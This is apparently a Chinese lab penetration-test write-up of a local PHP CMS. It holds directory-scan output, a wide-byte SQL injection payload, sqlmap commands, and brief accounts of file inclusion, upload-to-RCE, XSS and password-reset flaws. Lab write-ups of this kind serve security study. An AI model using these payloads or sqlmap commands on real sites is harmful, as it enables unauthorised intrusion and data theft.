一.信息收集
1.1 cms指纹识别
1
| whatweb http://192.168.235.129/
|

中间件:Apache/2.4.23 (Win32) + PHP5.4.45
CMS:xxCMS
操作系统:Windows32 位
Cookie 前缀:BLUE
1.2 目录扫描
1
| dirsearch -u http://192.168.235.129/
|

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46
| [04:02:15] 200 - 18B - /2.txt [04:02:18] 301 - 237B - /Admin -> http://192.168.235.129/Admin/ [04:02:18] 301 - 237B - /ADMIN -> http://192.168.235.129/ADMIN/ [04:02:18] 301 - 237B - /admin -> http://192.168.235.129/admin/ [04:02:18] 301 - 238B - /admin. -> http://192.168.235.129/admin./ [04:02:20] 200 - 857B - /admin%20/ [04:02:22] 200 - 857B - /Admin/ [04:02:23] 301 - 235B - /api -> http://192.168.235.129/api/ [04:02:23] 200 - 892B - /api/ [04:02:24] 200 - 857B - /admin/ [04:02:28] 301 - 236B - /data -> http://192.168.235.129/data/ [04:02:28] 200 - 892B - /data/ [04:02:28] 200 - 892B - /data/cache/ [04:02:30] 200 - 857B - /admin/index.php [04:02:32] 200 - 857B - /admin/login.php [04:02:33] 301 - 238B - /images -> http://192.168.235.129/images/ [04:02:33] 200 - 1B - /images/ [04:02:34] 200 - 892B - /include/ [04:02:34] 301 - 239B - /include -> http://192.168.235.129/include/ [04:02:34] 301 - 249B - /include/fckeditor -> http://192.168.235.129/include/fckeditor/ [04:02:34] 200 - 828B - /include/fckeditor/ [04:02:34] 403 - 225B - /index.php::$DATA [04:02:34] 301 - 239B - /INSTALL -> http://192.168.235.129/INSTALL/ [04:02:34] 301 - 239B - /Install -> http://192.168.235.129/Install/ [04:02:34] 301 - 239B - /install -> http://192.168.235.129/install/ [04:02:35] 200 - 892B - /js/ [04:02:38] 200 - 14KB - /l.php [04:02:42] 200 - 77KB - /phpinfo.php [04:02:42] 301 - 242B - /phpMyAdmin -> http://192.168.235.129/phpMyAdmin/ [04:02:42] 301 - 242B - /phpmyadmin -> http://192.168.235.129/phpmyadmin/ [04:02:43] 200 - 32KB - /phpmyadmin/ChangeLog [04:02:43] 200 - 2KB - /phpmyadmin/README [04:02:46] 200 - 4KB - /phpMyAdmin/ [04:02:46] 200 - 4KB - /phpMyAdmin/index.php [04:02:46] 200 - 4KB - /phpmyadmin/index.php [04:02:46] 200 - 4KB - /phpMyadmin/ [04:02:46] 200 - 4KB - /phpmyadmin/ [04:02:46] 200 - 4KB - /phpmyAdmin/ [04:02:47] 200 - 200B - /robots.txt [04:02:53] 200 - 264B - /templates/ [04:02:53] 301 - 241B - /templates -> http://192.168.235.129/templates/ [04:02:53] 200 - 4KB - /news.php [04:02:54] 403 - 225B - /Trace.axd::$DATA [04:02:55] 200 - 1KB - /search.php [04:02:57] 403 - 226B - /web.config::$DATA [04:02:57] 200 - 4KB - /user.php
|
二.渗透测试
2.1、注册界面验证码复用

2.2、用户注册验证用户名出现零宽度字节注入漏洞

1
| ?user_name=admin%df'+or+1=1+%23
|

1
| sqlmap -r req.txt --batch --dbms=mysql
|
存在时间盲注

查看一下当前数据库名
1
| sqlmap -r req.txt --batch --current-db
|

后续可获得admin账号密码
2.3、发布新闻文章概要部分存在存储型xss漏洞


2.4、前台登录验证码复用可爆破账号密码



2.5、前台登录存在万能用户名-万能密码
虽然不能登录 但是确实存在漏洞

2.6、前台登录盲注
万能密码都能用 所以这里布尔时间盲注都是可以用的
1
| sqlmap -r req.txt --batch --dbms=mysql
|

爆破一个数据库名验证一下
1
| MySQL >= 5.0.12 AND time-based blind (qu
|
2.7、文件/user.php存在文件包含漏洞和路径穿越漏洞
代码审计 可控参数拼接的包含路径

但是后面拼接了index.php 还要截断一下
测试

一个不存在的路径返回为空 已经确定是文件包含漏洞

存在路径穿越漏洞

截断index.php 任意文件包含漏洞

2.8、上传头像校验不严格
随便伪装一下就可以上传成功

这个上传路径都直接泄露了
data/upload/face_pic/17805777959.jpg

再加上面的文件包含漏洞 可以直接rce

2.9、后台登录万能密码
利用方式同上
2.10、后台登录时间盲注
利用方式同上
2.11、后台-分类信息模版管理存在 INSERT型SQL注入
代码审计
向数据库插入新模型,’$model_name’, ‘$show_order’这两个值直接拼进SQL语句

注入点在model_name
但是还不知道怎么利用 sqlmap也没跑出来

2.12、后台系统设置-模版管理编辑操作存在任意文件上传


2.13、任意用户重置漏洞
